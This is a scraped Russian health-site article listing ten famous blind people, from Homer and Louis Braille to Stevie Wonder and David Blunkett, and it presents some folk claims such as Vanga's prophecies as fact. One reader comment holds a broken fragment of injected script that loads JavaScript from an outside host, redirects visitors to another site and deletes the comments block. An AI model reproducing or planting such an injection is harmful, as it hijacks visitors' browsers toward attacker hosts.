Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  10 самых знаменитых незря...  >>  10 самых знаменитых незрячих
 
Обратная связь
 

10 самых знаменитых незрячих

Размер шрифта
Диана Паташян
14 сентября 2011 08:25
  • google_analytics: false
  • Нравится

На памятнике создателю алфавита для слепых Валентина Гаюи выбито обращение к незрячему ребенку: «Ты найдешь свет в образовании и труде». Мы подготовили список знаменитостей, которые на собственном примере подтвердили это.

 Стиви

Стиви Уандер

  1. Гомер

Известнейший слепец древности – Гомер, автор великих произведений «Илиада» и «Одиссея». О личности и жизни Гомера нет достоверных сведений, а его слепота и по сей день вызывает споры и сомнения, хотя в древние времена многие поэты-сказители были слепыми. Известно, что Демокрит сам ослепил себя с целью посвятить свою жизнь философии.

  1. Ванга

Легендарная ясновидящая Ванга ослепла в 12 лет. По одной из версий, Ванга потеряла зрение от удара молнии, по другой – ее засыпало землей, и песок повредил глаза. Существует версия, что операция по восстановлению зрения так и не была проведена, и Ванга до конца жизни осталась незрячей, но обрела дар предсказания.

  1. Блаженная Матрона

Святая Матрона была слепая от рождения. Мать Матроны хотела избавиться от будущего ребенка, но побоялась совершить грех. Она увидела сон, в котором еще не родившаяся дочь явилась в образе белой птицы с человеческим лицом и закрытыми глазами. В возрасте 7-8 лет у Матроны открылся дар предсказывать и исцелять. После ее смерти и по сей день блаженная Матрона помогает всем, кто приходит в храм к ее мощам.

  1. Николай Островский

Советский писатель Николай Островский утратил возможность видеть в результате тяжелых ранений. Кроме того, он был парализован, но это не помешало ему создать роман «Как закалялась сталь». Слепому Островскому писать было очень трудно, строчка набегала на строчку, буква на букву. Ему помогал трафарет – картонная папка с прорезями для строк. Но это не ускорило работы. Тогда он стал диктовать жене, друзьям. Летом 1933 года писатель закончил свой героический роман.

  1. Андреа Бочелли

Итальянский оперный певец Андреа Бочелли начал терять зрение в детстве и полностью ослеп в 12 лет в результате черепно-мозговой травмы во время игры в футбол. Несмотря на потерю зрения, он стал одним из наиболее запоминающихся голосов не только современной оперы, но и поп-музыки.

  1. Луи Брайль

Разработчик шрифта для незрячих Луи Брайль утратил возможность видеть, когда ему было 3 года. В гараже отца Луи поранил глаз шорным ножом. В дальнейшем развилось симпатическое воспаление глаз, и мальчик ослеп. Родители сделали все, чтобы ребенок овладел трудовыми навыками: они научили его шить домашние туфли, плести бахрому для конской упряжки. Они также пригласили учителя, который обучил Луи Брайля игре на скрипке. Спустя годы Луи Брайль стал создетелем шрифта для незрячих и облегчил жизнь многим слепым.

  1. Диана Гурцкая

Знаменитая певица Диана Гурцкая незрячая с рождения. С самого детства Диана мечтала о большой сцене. Училась параллельно в средней образовательной и музыкальной школах. Успех пришел к Диане сразу после фестиваля «Ялта-Москва-транзит» в 1995 году, где она исполнила песню «Тбилисо». На сеодняшний день Диана является создателем и руководителем благотворительного фонда помощи незрячим и слабовидящим «По зову сердца».

  1. Рэй Чарльз

Американский певец, композитор и пианист, создатель стиля соул Рэй Чарльз утратил возможность видеть из-за перенесенного потрясения в возрасте 5 лет: на его глазах утонул в лохани младший брат. Рэй попытался спасти брата, но ему так и не удалось вытащить его из воды. Будущий певец постепенно начал терять зрение и полностью ослеп в возрасте 7 лет. При этом Рэй Чарльз утверждает, что причина потери зрения ему до сих пор неизвестна, по его мнению, это последствия глаукомы.

  1. Стиви Уандер

Стиви Уандер потерял зрение из-за врачебной ошибки. Мальчик родился раньше срока, и сосуды его глаз не успели правильно развиться. В инкубатор для новорожденных, где он находился, была подана большая доза кислорода, и мальчик ослеп. По одной версии, мать учила его по обычному букварю (буквы различал благодаря чувствительности пальцев, которые «могли видеть» мельчайшие крупицы типографской краски), по другой версии – это был шрифт Брайля. Первый хит Fingertips Уандер записал в 13 лет.

  1. Дэвид Бланкетт

Слепоту бывшего министра внутренних дел Великобритании Дэвид Бланкетта обнаружили вскоре после его рождения. Виной стала плохая наследственность: из-за неудачной комбинации родительских генов у малыша не развился оптический нерв. Мать Дэвида винила во всем свой возраст, на момент рождения сына ей было за 40. На сегодняшний день Дэвид Бланкетт способен различать всего лишь свет и темноту. Бланкетта повсюду сопровождает его любимая собака-поводырь черный лабрадор Сэйди, которая недавно спасла его от нападения коровы.

Фото: Helga Esteb / Shutterstock.com

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

01 июля 2015 в 00:08

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Диана Гурцкая просит помочь слепой девочке   Настоящее чудо: слепые смогут снова видеть   7 правил общения с незрячими   Этот продукт спасет от слепоты  

Слайдшоу

Рассеянный склероз Что о вас скажут ваши глаза
Катаракта: наглядное руководство    
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.